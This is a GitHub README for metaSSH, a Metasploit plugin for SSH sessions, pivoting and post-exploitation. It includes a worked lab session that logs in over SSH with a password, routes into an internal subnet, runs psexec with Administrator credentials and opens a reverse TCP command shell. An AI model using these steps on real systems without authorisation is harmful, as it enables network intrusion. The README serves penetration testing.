forked from dirtyfilthy/metassh
-
Notifications
You must be signed in to change notification settings - Fork 1
/
README
202 lines (155 loc) · 7.48 KB
/
README
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
metaSSH session plugin for metasploit v0.1
==========================================
metaSSH is a session plugin for metasploit that gives you a meterpreter like interface over an ssh connection. When I started writing this code I just wanted to be able to cleanly reverse pivot over ssh from within metasploit but I guess I got a bit carried away.
Features
--------
* Multi-channel
* SFTP over same connection
* Pivoting & reverse pivoting via "route"
* Scriptable
* Supports post-exploitation modules
* Meterpreter-like api
Example
-------
Here is an example of using metaSSH to pivot through an ssh host at 192.168.56.4 to run psexec on a win2k box at 192.168.57.4, inside the internal subnet. The reverse tcp payload then reverse pivots (automagically) through our ssh box to give us a shell.
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 778 exploits - 415 auxiliary - 121 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
msf > setg LogLevel 3
LogLevel => 3
msf > load meta_ssh
payloads/singles/ssh/metassh_session.rb
exploits/multi/ssh/login_password.rb
[*] Successfully loaded plugin: metaSSH
msf > use multi/ssh/login_password
msf > set RHOST 192.168.56.3
RHOST => 192.168.56.3
msf > set USER dsl
USER => dsl
msf > set PASS reverse
PASS => reverse
msf > set PAYLOAD ssh/metassh_session
PAYLOAD => ssh/metassh_session
msf > exploit -z
[*] Connecting to [email protected]:22 with password reverse
[*] metaSSH session 1 opened (127.0.0.1 -> 192.168.56.3:22) at 2011-12-28 03:51:16 +1300
[*] Session 1 created in the background.
msf > route add 192.168.57.0 255.255.255.0 1
[*] Route added
msf > use exploit/windows/smb/psexec
msf > set RHOST 192.168.57.4
RHOST => 192.168.57.4
msf > set LHOST 192.168.57.3
LHOST => 192.168.57.3
msf > set LPORT 5557
LPORT => 5557
msf > set SMBUser Administrator
SMBUser => Administrator
msf > set SMBPass password
SMBPass => password
msf > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf > exploit
[*] Started reverse handler on 192.168.57.3:5557 via the metaSSH on session 1
[*] Connecting to the server...
[*] Authenticating to 192.168.57.4:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \ekuCbYaL.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.4[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.57.4[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (TCzOpXwW - "MvQGwrInlegXtnXAgQmQ")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \ekuCbYaL.exe...
[*] Command shell session 2 opened (127.0.0.1:43621 -> 127.0.0.1:50324) at 2011-12-28 03:51:18 +1300
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>^Z
Background session 2? [y/N] y
msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...
metaSSH > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background metaSSH script
bglist Lists running background scripts
bgrun Executes a metaSSH script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the ssh session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
quit Terminate the ssh session
run Executes a metaSSH script or Post module
use Deprecated alias for 'load'
Stdapi: System Commands
=======================
Command Description
------- -----------
execute Execute a command
shell Drop into a system command shell
Stdapi: Net Commands
====================
Command Description
------- -----------
portfwd forward local port to remote port
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
metaSSH >
Installation
------------
Make sure you are running the **latest** version of metasploit from github, metaSSH requires recent fixes to the bundled net/ssh library.
git clone https://github.com/rapid7/metasploit-framework.git
Get the latest version of metaSSH
git clone [email protected]:dirtyfilthy/metassh.git
Copy meta_ssh.rb & the meta_ssh directory to your metasploit plugins directory
cp -r meta_ssh.rb meta_ssh ~/metasploit/plugins
Usage
-----
After installation in msfconsole run "load meta_ssh" to load the plugin. Two new exploit modules and one new payload module will become available. The exploits "multi/ssh/login_password" & "multi/ssh/login_pubkey" both let you login to an ssh server through different means and are fairly self explanatory. The payload for each of these must be "ssh/metassh_session" which will spawn metaSSH.
### Pivoting
To get pivoting to work just add a route to your internal subnet through your metaSSH session like so:
msf > route add 192.168.57.0 255.255.255.0 1
NOTE: For reverse pivoting GatewayPorts MUST be set to yes in sshd_config on your pivot box. At some point I'll probably add an emulation mode with mkfifo & netcat.
### Post-exploitation modules
To use run them from the metaSSH session just like meterpreter
metaSSH > run post/linux/gather/checkvm
[*] Gathering System info ....
[+] This appears to be a VirtualBox Virtual Machine
Bugs
----
Forwarded ports (local and remote) are never released until the metaSSH session ends. For some reason I couldn't figure out, attempting to cancel port forwarding also kills any popped sessions. Any other bugs please open an issue on my github ( https://github.com/dirtyfilthy/metassh ). Pull requests/fixes gratefully accepted.
Acknowledgements
----------------
This code is based heavily on the meterpreter session code included with metasploit and has in many cases simply been "cargo culted" and altered.
Author
-----
dirtyfilthy -- http://twitter.com/dirtyfilthy -- [email protected]